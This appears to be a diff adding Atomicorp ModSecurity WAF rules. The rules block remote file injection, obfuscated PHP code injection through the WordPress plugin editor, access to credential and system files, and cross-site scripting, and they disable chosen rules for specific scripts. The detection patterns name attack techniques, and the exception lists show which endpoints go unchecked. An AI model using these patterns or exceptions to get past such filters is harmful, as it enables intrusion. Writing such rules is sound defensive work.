+SecAction "phase:2,id:91275,t:none,pass,nolog,skipAfter:END_RULES_91275"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340698,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:file "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340699,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91275
+
+SecRule REQUEST_FILENAME "/adm-misc\.php" "phase:2,id:91276,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91277,t:none,pass,nolog,skipAfter:END_RULES_91277"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:3|!ARGS:body|!ARGS:/txt/|!ARGS:/text/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340700,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:3|!ARGS:body|!ARGS:/txt/|!ARGS:/text/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340701,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91277
+
+SecRule REQUEST_FILENAME "/piwik\.php" "phase:2,id:91278,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91279,t:none,pass,nolog,skipAfter:END_RULES_91279"
+
+SecRule ARGS|!ARGS:action_name|!ARGS:q|!ARGS:/ref/|!ARGS:link|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340702,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:action_name|!ARGS:q|!ARGS:/ref/|!ARGS:link|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:urlDecodeUni,t:none,t:htmlEntityDecode,multimatch,id:340703,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91279
+
+SecRule REQUEST_FILENAME "/admin/file_edit\.php" "phase:2,id:91280,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91281,t:none,pass,nolog,skipAfter:END_RULES_91281"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download|!ARGS:filebody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340704,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:download|!ARGS:filebody "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340705,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91281
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:91282,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020"
+SecAction "phase:2,id:91283,t:none,pass,nolog,skipAfter:END_RULES_91283"
+
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,multimatch,id:344729,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhitespace,id:344730,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"
+SecRule ARGS "(?:(?:eval|passthru) ?\( ?(?:base64_decode|gz(?:inflate|decode|encode)) ?\(|str_rot13 ?\()"  "t:none,t:compressWhitespace,id:344731,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Potentially malicious code injection via WP plugin-editor',deny,log,auditlog,status:403,phase:2"
+
+SecMarker END_RULES_91283
+
+SecRule REQUEST_FILENAME "/fplayer\.swf" "phase:2,id:91284,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91285,t:none,pass,nolog,skipAfter:END_RULES_91285"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340706,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:config "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340707,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91285
+
+SecRule REQUEST_FILENAME "/mailer/images\.php" "phase:2,id:91286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"
+
+SecRule REQUEST_FILENAME "/mailer/redir\.php" "phase:2,id:91287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340084"
+
+SecRule REQUEST_FILENAME "/sqlpatch\.php" "phase:2,id:91288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=340146,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340156,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340159,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380022,ctl:ruleRemovebyID=380121,ctl:ruleRemovebyID=380122,ctl:ruleRemovebyID=380023,ctl:ruleRemovebyID=380024,ctl:ruleRemovebyID=380025,ctl:ruleRemovebyID=381025,ctl:ruleRemovebyID=380126,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=390711"
+
+SecRule REQUEST_FILENAME "/tbl_select\.php" "phase:2,id:91289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=344374,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/cgi-bin/cart\.cgi" "phase:2,id:91290,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91291,t:none,pass,nolog,skipAfter:END_RULES_91291"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/image/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340708,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/image/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340709,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91291
+
+SecRule REQUEST_FILENAME "/tce_file\.php" "phase:2,id:91292,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91293,t:none,pass,nolog,skipAfter:END_RULES_91293"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340710,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340711,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91293
+
+SecRule REQUEST_FILENAME "/writetosfdc\.php" "phase:2,id:91294,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91295,t:none,pass,nolog,skipAfter:END_RULES_91295"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:/write/|!ARGS:/Past/|!ARGS:Reference_1_Contact_Info__c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340712,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:/write/|!ARGS:/Past/|!ARGS:Reference_1_Contact_Info__c "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340713,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91295
+
+SecRule REQUEST_FILENAME "/admin/nmanage\.php" "phase:2,id:91296,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91297,t:none,pass,nolog,skipAfter:END_RULES_91297"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:news "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "id:340714,t:none,chain,t:none,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/file/|!ARGS:redirect|!ARGS:news "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340715,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91297
+
+SecRule REQUEST_FILENAME "/login\.php" "phase:2,id:91298,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=340009,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340148"
+SecAction "phase:2,id:91299,t:none,pass,nolog,skipAfter:END_RULES_91299"
+
+
+SecRule REQUEST_FILENAME|ARGS|ARGS_NAMES|!ARGS:pass "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" "phase:2,capture,t:none,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'320465',rev:1,logdata:'%{TX.0}',severity:'2',deny,status:403,phase:2"
+SecRule REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie "(?:\b(?:\.(?:ht(?:access|passwd|group)|www_?acl)|global\.asa|httpd\.conf|boot\.ini)\b|\/etc\/)" "phase:2,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,ctl:auditLogParts=+E,deny,log,auditlog,msg:'Atomicorp.com WAF Rules: Attempt to Access protect file Remotely',id:'320466',rev:1,logdata:'%{TX.0}',severity:'2',deny,status:403,phase:2"
+
+SecRule REQUEST_HEADERS|!REQUEST_HEADERS:X-PageView|!REQUEST_HEADERS:Cookie|!REQUEST_HEADERS:REFERER|ARGS|!ARGS:pass|!ARGS:returnto|!ARGS:php|!ARGS:nextpage "(?:/(?:etc|proc|var/tmp|usr|opt|s?bin|dev|kern|[br]oot|sys|windows|winnt)/|(?:\/|\\\\)+inetpub|localstart\.asp|boot\.ini)"         "t:normalisePath,capture,id:320464,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Protected Path Access denied in URI/ARGS',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+SecRule ARGS|!ARGS:scope|!ARGS:/link/|!ARGS:/openid/|!ARGS:/contact_map/|!ARGS:server|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/return/|!ARGS:password|!ARGS:ref|!ARGS:location|!ARGS:takeback|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:referrer|!ARGS:/homepage/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"          "id:340716,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:scope|!ARGS:/link/|!ARGS:/openid/|!ARGS:/contact_map/|!ARGS:server|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/return/|!ARGS:password|!ARGS:ref|!ARGS:location|!ARGS:takeback|!ARGS:return|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:referrer|!ARGS:/homepage/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?)\:/"  "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340717,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS',deny,log,auditlog,status:403,phase:2"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/[head]/|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|< ?/?i?frame|\%env)"           "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multiMatch,capture,id:360030,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}',deny,log,auditlog,status:403,phase:2"
+
+
+SecMarker END_RULES_91299
+
+SecRule REQUEST_FILENAME "/amember/admin/email\.php" "phase:2,id:91300,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91301,t:none,pass,nolog,skipAfter:END_RULES_91301"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:vars "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"          "deny,log,auditlog,status:403,phase:2,id:340718,chain,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/txt/|!ARGS:/text/|!ARGS:/redir/|!ARGS:vars "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "deny,log,auditlog,status:403,phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340719,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS'"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91301
+
+SecRule REQUEST_FILENAME "/webinstall\.php" "phase:2,id:91302,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
